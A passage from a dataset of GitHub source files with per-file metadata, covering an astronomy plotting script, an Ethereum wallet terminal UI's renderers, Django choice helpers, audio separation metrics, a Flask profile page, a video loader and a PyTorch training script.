"github-code", "pt": "52", "api": [{"api_name": "src.evaluate.AnchorResults", "line_number": 9, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 30, "usage_type": "call"}, {"api_name": "src.evaluate.AnchorResults", "line_number": 37, "usage_type": "call"}, {"api_name": "src.evaluate.AnchorResults", "line_number": 49, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 59, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 64, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 70, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 78, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 85, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 95, "usage_type": "call"}, {"api_name": "src.evaluate.EAO_Rank", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "2138419395", "text": "\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\n\ndef save(filename, names, data):\n \"\"\"\n filename = a string specifying the name of the file to be saved\n names = a tuple of the variable names given as strings\n data = a tuple of arrays\n \"\"\"\n\n fyl = open(filename, 'wb')\n\n for i, name in enumerate(names):\n fyl.write(name + '\\n') # \\n = a linebreak\n\n var = data[i]\n shape = var.shape\n shape = ','.join(np.array(shape,dtype=str))\n fyl.write(shape+'\\n')\n \n dtype = str(var.dtype)\n fyl.write(dtype+'\\n')\n\n var_str = var.flatten().tobytes()\n fyl.write(var_str+'\\n\\n')\n\n fyl.close()\n \n\n\n\ndef restore(filename):\n \"\"\"\n filename = a string specifying the name of the file to be restored\n \"\"\"\n\n fyl = open(filename,'rb')\n\n data = []\n \n print(\"Restoring variables: \\n\")\n while True:\n var_name = fyl.readline()\n if var_name == \"\": break\n print(var_name)\n\n shape = fyl.readline().replace('\\n', '') # I CHANGED THIS\n shape = shape.split(',')\n shape = np.array(shape,dtype=int)\n \n dtype = fyl.readline().replace('\\n','') # I CHANGED THIS\n\n data_str = \"\"\n line = \"\"\n while line != '\\n':\n data_str += line\n line = fyl.readline()\n\n array = np.fromstring(data_str[:-1],dtype=dtype)\n array = array.reshape(shape)\n data.append(array) \n\n fyl.close()\n return data\n\n\n# In[2]:\n\njuldate,averager,averagek,variancer,variancek = restore('Wilson_project3Cii.dat')\n\n\n# In[5]:\n\nimport matplotlib.pyplot as plt\nf, axarr = plt.subplots(2,1) #This part of the code takes the two histograms and puts them in the same image\nplt.subplots_adjust(hspace = 0.55,wspace = 0.5)\nfigure = plt.gcf()\n\naxarr[0].plot(juldate,averager,label = 'Red Continuum',color='R')#plot of 1st moment vs. time\naxarr[0].plot(juldate,averagek,label = \"Calcium\")\naxarr[0].set_title('1st Moment for Both Filters') \naxarr[0].set_ylabel('Average') \naxarr[0].set_xlabel('Time of Day')\naxarr[0].legend(loc=5) #I needed to change the location of the legend so it didn't overlap with the data\n\naxarr[1].plot(juldate,variancer,label = 'Red Continuum',color='R')#plot of 2nd moment vs. time\naxarr[1].plot(juldate,variancek,label = \"Calcium\")\naxarr[1].set_title('2nd Moment for Both Filters') \naxarr[1].set_ylabel('Variance') \naxarr[1].set_xlabel('Time of Day')\naxarr[1].legend(loc=5)\n\nfigure.savefig('Wilson_project3Cii.png',format='png')\nplt.show()\n\n\n# In[ ]:\n\n\n\n", "repo_name": "skyentist/Astr3800", "sub_path": "Project3/Wilson_project3Cii_plot.py", "file_name": "Wilson_project3Cii_plot.py", "file_ext": "py", "file_size_in_byte": 2560, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "20332304505", "text": "from asciimatics.renderers import DynamicRenderer\nfrom asciimatics.screen import Screen\nfrom decimal import Decimal\nfrom shadowlands.tui.errors import PriceError\nfrom shadowlands.sl_node import NodeConnectionError\nimport qrcode\nfrom shadowlands.tui.debug import debug\nimport pdb\n\nSL_COLOR = (Screen.COLOUR_GREEN, Screen.A_NORMAL, Screen.COLOUR_BLACK)\n\n\ndef sl_color_map(image):\n return [SL_COLOR for _ in range(len(image))]\n\n\nclass TxQueueHashRenderer(DynamicRenderer):\n\n def __init__(self, interface):\n super(TxQueueHashRenderer, self).__init__(1, 32)\n self._interface = interface\n\n @property\n def txqueue(self):\n return self._interface.config.txqueue\n\n def _render_now(self):\n if len(self.txqueue(self._interface.node.network)) < 1:\n return [''], [()]\n\n image = \"TXs: \" \n color_map = sl_color_map(image)\n\n for index, tx in enumerate(self.txqueue(self._interface.node.network)):\n\n if index > 0 and index < len(self.txqueue(self._interface.node.network)):\n image += '║'\n color_map += [SL_COLOR]\n \n tx_image = \" {}) {} \".format(index, tx['rx'].hash.hex()[0:9])\n tx_map = sl_color_map(tx_image) \n tx_map[1] = (Screen.COLOUR_WHITE, \n Screen.A_BOLD, \n Screen.COLOUR_BLACK) \n image += tx_image \n color_map += tx_map\n\n #debug(); pdb.set_trace()\n return [image], [color_map]\n\n\n#debug(); pdb.set_trace()\ndef img_colour_map(image):\n return image, [[(Screen.COLOUR_GREEN, Screen.A_NORMAL, Screen.COLOUR_BLACK) for _ in range(len(image[0])) ] ]\n\nclass NetworkStatusRenderer(DynamicRenderer):\n def __init__(self, _node):\n super(NetworkStatusRenderer, self).__init__(1, 25)\n self.node = _node\n\n def _render_now(self):\n if self.node.connection_type and self.node.network_name:\n image = [\"{}, {}\".format(self.node.connection_type, self.node.network_name)]\n else:\n image = ['No ethereum connection']\n\n return img_colour_map(image)\n\n\nclass BlockStatusRenderer(DynamicRenderer):\n def __init__(self, _node):\n super(BlockStatusRenderer, self).__init__(1, 40)\n self.node = _node\n\n\t\n def _render_now(self):\n images = ['[block ' + str(self.node.best_block) + ']']\n return img_colour_map(images)\n\nclass AddressRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(AddressRenderer, self).__init__(1, 32)\n self._interface = interface\n\n def _render_now(self):\n if not self._interface.credstick:\n image = ['Unknown']\n else:\n image = [ self._interface.credstick.addressStr() ]\n\n return img_colour_map(image)\n\n\nclass HDPathRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(HDPathRenderer, self).__init__(1, 32)\n self._interface = interface\n\n def _render_now(self):\n if not self._interface.credstick:\n image = ['Unknown']\n else:\n image = [ self._interface.credstick.hdpath ]\n\n return img_colour_map(image)\n\ndef txqueue():\n #return []\n return [\n {\n 'tx_hash': '0x36283e1c4d5ce3d671597ed05812a7562b05157b3559e264f4ab473a62dc5720',\n 'description': 'Send Ether'\n },\n {\n 'tx_hash': '0x291e0c845afd6dd2a21f4933ce374c5b86db5358b1b6576829b22d30a582e2bd',\n 'description': 'Generate DAI'\n },\n {\n 'tx_hash': '0x4c8bc0842ca19d90f4c1047a3961687ea494a1d8645df02f575be863ccb9d89c',\n 'description': 'Materialize'\n },\n {\n 'tx_hash': '0x961687ea494a1d8645df02f575be863ccb9d89c',\n 'description': 'Materialize'\n },\n {\n 'tx_hash': '0x5df02f575be863ccb9d89c',\n 'description': 'Materialize'\n }\n \n ]\n\n\nclass CredstickNameRenderer(DynamicRenderer):\n def __init__(self, interface, add_padding=True):\n super(CredstickNameRenderer, self).__init__(1, 9)\n self._interface = interface\n self._node = interface.node\n self._add_padding = add_padding\n\n def _render_now(self):\n space_available = 29 \n if not self._interface.credstick:\n #image = ['blergh']\n image = ['Please insert Credstick.']\n else:\n name = self._interface.credstick.manufacturerStr + ' ' + self._interface.credstick.productStr\n address = self._interface.credstick.address\n hdpath = self._interface.credstick.hdpath\n if self._add_padding:\n padding = '═' * (space_available - len(name))\n else:\n padding = \"detected. \\nHD derivation {}\\nEthereum address {}\\nResolving ENS...\\nLoading Eth balance...\\nLoading Erc20 balances...\".format(hdpath, address)\n\n image = [ \"{} {}\".format(name,padding) ]\n \n return img_colour_map(image)\n\nclass QRCodeRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(QRCodeRenderer, self).__init__(17, 31)\n self._interface = interface\n\n def _render_now(self):\n if not self._interface.credstick:\n qr_image = ['No QR Data']\n colour_map = [None, 0, 0]\n else:\n #debug(); pdb.set_trace()\n qr = qrcode.QRCode(\n version=1,\n box_size=4,\n border=1,\n )\n\n #debug(); pdb.set_trace()\n qr.add_data(self._interface.credstick.addressStr())\n qr.make(fit=True)\n qr_string = qr.print_ascii(string_only=True)\n\n qr_image = qr_string.split('\\n')\n #debug(); pdb.set_trace()\n colour_map = [[(Screen.COLOUR_GREEN, Screen.A_NORMAL, Screen.COLOUR_BLACK) for _ in range(self._width)]\n for _ in range(self._height)]\n return qr_image, colour_map\n\n\n\nclass EthBalanceRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(EthBalanceRenderer, self).__init__(1, 30)\n self._interface = interface\n\n def _render_now(self):\n try:\n bal = self._interface.node.eth_balance\n except AttributeError:\n return img_colour_map(['Unknown'])\n\n bal_str = 'Unknown'\n\n if bal:\n bal_str = \"{:f}\".format( bal )\n\n image = [bal_str]\n\n return img_colour_map(image)\n\n\nclass EthValueRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(EthValueRenderer, self).__init__(1, 15)\n self._interface = interface\n\n def _render_now(self):\n bal = self._interface._node.eth_balance\n\n if bal is None or self._interface._node.eth_price is None:\n return img_colour_map([''])\n\n val = str(bal * self._interface._node.eth_price)[0:18]\n image = [ \"{} {} {}\".format('USD', '$', val) ]\n\n return img_colour_map(image)\n\n\nclass ENSRenderer(DynamicRenderer):\n def __init__(self, interface):\n super(ENSRenderer, self).__init__(1, 16)\n self._interface = interface\n\n def _render_now(self):\n domain = self._interface.node.ens_domain\n if not domain:\n domain = 'No Reverse ENS'\n\n image = [domain]\n\n return img_colour_map(image)\n\n\n\n\n", "repo_name": "kayagoban/shadowlands", "sub_path": "shadowlands/tui/renderers.py", "file_name": "renderers.py", "file_ext": "py", "file_size_in_byte": 7360, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 142, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asciimatics.screen.Screen.COLOUR_GREEN", "line_number": 10, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 10, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_NORMAL", "line_number": 10, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 10, "usage_type": "attribute"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 17, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.COLOUR_WHITE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 42, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_BOLD", "line_number": 43, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 43, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 44, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 44, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.COLOUR_GREEN", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 54, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_NORMAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 56, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 70, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 80, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 94, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 134, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 159, "usage_type": "name"}, {"api_name": "qrcode.QRCode", "line_number": 170, "usage_type": "call"}, {"api_name": "asciimatics.screen.Screen.COLOUR_GREEN", "line_number": 183, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen", "line_number": 183, "usage_type": "name"}, {"api_name": "asciimatics.screen.Screen.A_NORMAL", "line_number": 183, "usage_type": "attribute"}, {"api_name": "asciimatics.screen.Screen.COLOUR_BLACK", "line_number": 183, "usage_type": "attribute"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 189, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 210, "usage_type": "name"}, {"api_name": "asciimatics.renderers.DynamicRenderer", "line_number": 227, "usage_type": "name"}]} +{"seq_id": "4228764594", "text": "# -*- encoding: utf-8 -*-\n\"\"\"\n@File Name : choices.py\n@Create Time : 2022/11/13 18:16\n@Description : \n@Version : \n@License : MIT\n@Author : diklios\n@Contact Email : diklios5768@gmail.com\n@Github : https://github.com/diklios5768\n@Blog : \n@Motto : All our science, measured against reality, is primitive and childlike - and yet it is the most precious thing we have.\n\"\"\"\n__auth__ = 'diklios'\n\nfrom typing import Any\n\nfrom django.db import models\n\n\ndef reverse_choices(choices: tuple[tuple] or models.Choices):\n if isinstance(choices, tuple):\n return tuple(reversed(choice) for choice in choices)\n elif isinstance(choices, models.Choices):\n return models.Choices(tuple(reversed(choice) for choice in choices.choices))\n else:\n raise TypeError('choices must be tuple or models.Choices')\n\n\ndef choices_to_dict(choices: tuple[tuple] or models.Choices) -> dict:\n if isinstance(choices, tuple):\n return {k: v for k, v in choices}\n elif isinstance(choices, models.Choices):\n return {k: v for k, v in choices.choices}\n else:\n raise TypeError('choices must be tuple or models.Choices')\n\n\ndef reverse_choices_to_dict(choices: tuple[tuple] or models.Choices) -> dict:\n \"\"\"\n 将choices的逆序转换为字典\n \"\"\"\n if isinstance(choices, tuple):\n return {v: k for k, v in choices}\n elif isinstance(choices, models.Choices):\n return {v: k for k, v in choices.choices}\n else:\n raise TypeError('choices must be tuple or models.Choices')\n\n\ndef get_choices_key(choices: tuple[tuple] or models.Choices, choice_value: str, strict: bool = False) -> str or int:\n \"\"\"\n :param choices:\n :param choice_value:\n :param strict:模糊匹配或者严格匹配\n :return:\n \"\"\"\n choices_dict = reverse_choices_to_dict(choices)\n if strict:\n return choices_dict.get(choice_value, None)\n for v, k in choices_dict.items():\n if choice_value in v:\n return k\n return None\n\n\ndef choices_to_list(choices: tuple[tuple] or models.Choices, mode: str = 'val') -> list:\n return list(choices_to_dict(choices).values()) if mode == 'val' else list(choices_to_dict(choices).keys())\n\n\ndef list_to_choices(choices: list) -> tuple[tuple[Any, Any], ...]:\n return tuple((v, v) for v in choices)\n\n\ndef same_choices(choices: tuple[tuple] or models.Choices, mode: str = 'val') -> tuple[tuple[Any, Any], ...]:\n return list_to_choices(choices_to_list(choices, mode))\n", "repo_name": "diklios5768/BaseDjangoSystem", "sub_path": "System/Common/viewModels/choices.py", "file_name": "choices.py", "file_ext": "py", "file_size_in_byte": 2548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.Choices", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 67, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.Choices", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "26808826431", "text": "\n'''\nPart of the code modified from\nhttps://github.com/andabi/music-source-separation\n'''\n\nimport numpy as np\nfrom mir_eval.separation import bss_eval_sources\n\ndef calc_sdr(w_real, w_pred):\n n_real, = w_real.shape\n n_pred, = w_pred.shape\n n = min(n_real, n_pred)\n \n w_real, w_pred = w_real[:n], w_pred[:n]\n\n sdr, _, _, _ = bss_eval_sources(w_real, w_pred, compute_permutation=True)\n return sdr\n\ndef bss_eval(mixed_wav, src1_wav, src2_wav, pred_src1_wav, pred_src2_wav):\n len = pred_src1_wav.shape[0]\n src1_wav = src1_wav[:len]\n src2_wav = src2_wav[:len]\n mixed_wav = mixed_wav[:len]\n sdr, sir, sar, _ = bss_eval_sources(np.array([src1_wav, src2_wav]),\n np.array([pred_src1_wav, pred_src2_wav]), compute_permutation=True)\n sdr_mixed, _, _, _ = bss_eval_sources(np.array([src1_wav, src2_wav]),\n np.array([mixed_wav, mixed_wav]), compute_permutation=True)\n nsdr = sdr - sdr_mixed\n return nsdr, sir, sar, len\n\ndef bss_eval_sdr(src1_wav, pred_src1_wav):\n len_cropped = pred_src1_wav.shape[0]\n src1_wav = src1_wav[:len_cropped]\n\n sdr, _, _, _ = bss_eval_sources(src1_wav,\n pred_src1_wav, compute_permutation=True)\n return sdr\n", "repo_name": "tuxzz/emrpcnn_pub", "sub_path": "cli/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 17, "usage_type": "call"}, {"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "mir_eval.separation.bss_eval_sources", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "39523194909", "text": "import datetime, logging\nfrom collections import defaultdict\nfrom operator import itemgetter\n\nfrom flask import render_template, Markup\n\nfrom fbvoting.apis.fb import get_user_id\nfrom fbvoting.db.directvote import has_direct_or_delegate_vote\nfrom fbvoting.db.delegatevote import delegation_category_and_date_generator\nfrom fbvoting.db.users import get_rank_and_percentiles\nfrom fbvoting.db.categories import categories\nfrom fbvoting.conf import DOMAIN\nimport commons\n\nlogger = logging.getLogger(__name__)\n\ndef build_profile():\n \n userid = get_user_id()\n \n count_genre, count_time = get_stat_counters(userid)\n total_nominations = sum(count_genre.values())\n dates, date_values, timeplot_options = prepare_time_plot(count_time)\n \n data = commons.get_base_data()\n data.update({\n 'active_section': 'profile',\n 'brief_comment': get_plural_and_brief_comment(total_nominations),\n 'total_nominations': total_nominations,\n 'nonzero': total_nominations > 0\n })\n \n if total_nominations > 0:\n best_category = max(count_genre.items(), key=itemgetter(1))[0]\n data.update({\n 'share_message': get_share_message(total_nominations, best_category),\n 'picture': '%s/static/images/categories/%s.jpg' % (DOMAIN, best_category),\n 'dates': dates,\n 'date_values': date_values,\n 'categories': categories(),\n 'category_values': [count_genre.get(c, 0) for c in categories()],\n 'timeplot_options': timeplot_options,\n 'categories_with_requests': categories_with_requests(userid, count_genre)\n })\n \n data.update(get_ranking_infos(userid))\n \n else:\n data.update({\n 'picture': DOMAIN + '/static/images/liquid-fm-icon-medium.png',\n 'share_message': \"\"\"\n Do you trust my taste in music, or you'd like to share yours?\n Do it with Liquid FM!\n \"\"\"\n })\n \n return render_template('profile.html', **data)\n\n\n_fmt = lambda x : (\"%.0f\" % x) if x > 1 else str(x) \n\ndef get_ranking_infos(user):\n stats = get_rank_and_percentiles(user)\n \n infos = sorted( [\n (cat, scores['perc'])\n for (cat, scores) in stats.items()\n if scores['perc'] < 51\n ], key = itemgetter(1))\n \n if not infos:\n return {}\n else:\n results = {}\n \n best_genre, best_perc = infos[0]\n guru_status = best_perc < 10\n \n title = (best_genre + \" \" +\n (\"guru\" if guru_status else \"expert\") + \"!\"\n )\n \n share_msg = (\n title + ' I am in the top ' + _fmt(best_perc) + '% of all ' +\n 'Liquid FM users when it comes to ' + best_genre + ' music!'\n )\n \n details = (\n \"

    According to our ranking system, \" +\n \"you're in the top \" + _fmt(best_perc) + \"% of all Liquid FM \"+\n \"users when it comes to \" + best_genre + \" music! \" +\n \"That means your \" +\n best_genre + \" votes are \" +\n (\"very \" if guru_status else \"\") + \"important to the community.

    \"\n )\n \n if len(infos) > 1:\n details += \"

    Also, you're\"\n other_genres = [ (\"in the top \" + _fmt(p) + \"% for \" + c + \"\") for (c, p) in infos[1:]]\n \n if len(other_genres) == 1:\n details += \" \" + other_genres[0] + \".\"\n else:\n details += \":

    • \" + \"
    • \".join(other_genres) + \"
    \"\n \n details += \"

    \"\n \n \n results['ranking_infos'] = Markup(\"\"\"\n
    \n \"\"\n

    %s

    \n %s\n \"\"\" % (best_genre, title, details) )\n \n results['picture_guru'] = DOMAIN + ('/static/images/categories/%s.jpg' % best_genre)\n results['share_guru'] = share_msg\n \n return results\n\n\n\ndef get_plural_and_brief_comment(n):\n if n == 0:\n return \"s, yet!\"\n if n == 1:\n return \" from a friend!\"\n return \"s from your friends!\"\n\ndef categories_with_requests(user, stats_genre):\n assert type(user) in (int, long)\n \n return [\n genre for genre, nominations in stats_genre.items()\n if nominations > 0\n and not has_direct_or_delegate_vote(user, genre)\n ]\n \n\n\ndef get_share_message(tot, best_category):\n times = (\"%i times \" % tot) if tot > 1 else \"\"\n return (\"I've been nominated %son Liquid FM, and\\\n I've discovered that my friends trust my taste in %s music!\"\n % (times, best_category) )\n\n\ndef get_stat_counters(userid):\n count_genre = defaultdict(int)\n count_time = defaultdict(int)\n \n for category, date in delegation_category_and_date_generator(userid):\n count_genre[category] += 1\n week = date.timetuple().tm_yday / 7\n count_time[date.year, week] += 1\n \n return count_genre, count_time\n\ndef get_current_year_week():\n now = datetime.datetime.now().timetuple()\n return now.tm_year, now.tm_yday / 7\n\n\ndef prepare_time_plot(count_time):\n if len(count_time) == 0:\n return [datetime.datetime.now().strftime(\"%d %B %Y\")], [0], {}\n \n labels = []\n data = []\n \n today = datetime.date.today()\n \n def get_label(year, week):\n date = datetime.date(year, 1, 1) + datetime.timedelta(7 * (week +1))\n if date > today: # it does not make sense to show future dates\n date = today\n return date.strftime(\"%d %B %Y\")\n \n \n year, week = min(count_time.keys())\n labels.append(get_label(year, week - 1))\n data.append(0)\n \n total_value = 0\n for ((year, week), value) in sorted(count_time.items()):\n labels.append(get_label(year, week))\n total_value += value\n data.append(total_value)\n \n current_year, current_week = get_current_year_week()\n while year < current_year or week < (current_week-1):\n week += 1\n if week == 52:\n week = 0\n year += 1\n \n labels.append(get_label(year, week))\n data.append(total_value)\n \n \n if len(data) < 10:\n options = {\n 'scaleOverride' : True,\n 'scaleSteps' : max(data),\n 'scaleStepWidth' : 1,\n 'scaleStartValue' : 0,\n }\n else:\n options = {}\n \n return labels, data, options\n \n\n\n", "repo_name": "corradomonti/fbvoting", "sub_path": "fbvoting/pagebuilders/buildprofile.py", "file_name": "buildprofile.py", "file_ext": "py", "file_size_in_byte": 6604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "fbvoting.apis.fb.get_user_id", "line_number": 19, "usage_type": "call"}, {"api_name": "commons.get_base_data", "line_number": 25, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 34, "usage_type": "call"}, {"api_name": "fbvoting.conf.DOMAIN", "line_number": 37, "usage_type": "name"}, {"api_name": "fbvoting.db.categories.categories", "line_number": 40, "usage_type": "call"}, {"api_name": "fbvoting.db.categories.categories", "line_number": 41, "usage_type": "call"}, {"api_name": "fbvoting.conf.DOMAIN", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 57, "usage_type": "call"}, {"api_name": "fbvoting.db.users.get_rank_and_percentiles", "line_number": 63, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.Markup", "line_number": 109, "usage_type": "call"}, {"api_name": "fbvoting.conf.DOMAIN", "line_number": 116, "usage_type": "name"}, {"api_name": "fbvoting.db.directvote.has_direct_or_delegate_vote", "line_number": 136, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 149, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 150, "usage_type": "call"}, {"api_name": "fbvoting.db.delegatevote.delegation_category_and_date_generator", "line_number": 152, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 160, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 166, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 166, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 171, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 171, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 174, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "75336250723", "text": "# video_read_plugin=\"load-avi-mp4-mov\"\n# video_read_plugin_kwargs={}\n\nimport pims\n\ndef video_read(avi_path, start_frame, stop_frame, **kw):\n data = pims.open(avi_path)\n\n if not start_frame: start_frame=0\n if not stop_frame: stop_frame=len(data)+1\n\n start_frame_clamped = max(0, start_frame)\n stop_frame_clamped = min(len(data)+1, stop_frame)\n\n data_sliced = data[start_frame_clamped:stop_frame_clamped]\n data_sliced.shape = [len(data_sliced), *data_sliced[0].shape]\n\n # data is indexed as data[iframe][iheight,iwidth,ichannel]\n\n return data.frame_rate, data_sliced\n", "repo_name": "JaneliaSciComp/SongExplorer", "sub_path": "src/load-avi-mp4-mov.py", "file_name": "load-avi-mp4-mov.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pims.open", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "139569158", "text": "from argparse import ArgumentParser\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import Trainer \nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.utilities.model_summary import ModelSummary\n\nfrom latent_actions import cvae\nfrom latent_actions.data.dataset import EpisodicDataset, DemonstrationDataset\n\n\nparser = ArgumentParser()\nparser.add_argument(\n \"--model_class\", default=\"cVAE\", type=str, \n choices=cvae.DECODER_CLASS.keys())\nparser.add_argument(\"--batch_size\", type=int, default=32)\n# NOTE: Trainer.add_argparse_args(parser) kind of pollutes the \n# hyperparameter space.\nparser.add_argument(\"--max_epochs\", type=int, default=400)\nparser.add_argument(\"--no_wandb\", action=\"store_true\")\nparser.add_argument(\"--data_path\", type=str, required=True)\nargs, _ = parser.parse_known_args()\n\nepisodic_dataset = EpisodicDataset.load(args.data_path)\nparser = DemonstrationDataset.add_dataset_specific_args(parser, episodic_dataset)\nargs, _ = parser.parse_known_args()\ndataset = DemonstrationDataset(episodic_dataset, **vars(args))\n\nModelClass = cvae.DECODER_CLASS[args.model_class]\nparser = ModelClass.add_model_specific_args(parser)\nargs = parser.parse_args()\n\ntrain_set, test_set = torch.utils.data.random_split(\n dataset, [int(len(dataset) * .8), len(dataset) - int(len(dataset) * .8)])\ntrain_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True)\ntest_loader = DataLoader(test_set, batch_size=args.batch_size, shuffle=True)\n\nmodel = ModelClass(\n context_dim=dataset.get_context_dim(), \n action_dim=dataset.get_action_dim(), \n **vars(args))\nmodel.set_kl_scheduler(n_steps=args.max_epochs*len(train_loader)) \n\nif not args.no_wandb:\n wandb_logger = WandbLogger(\n project=\"latent-action\", entity=\"ucla-ncel-robotics\")\n trainer = Trainer(\n logger=wandb_logger, \n auto_select_gpus=True,\n max_epochs=args.max_epochs)\nelse:\n trainer = Trainer(\n auto_select_gpus=True,\n 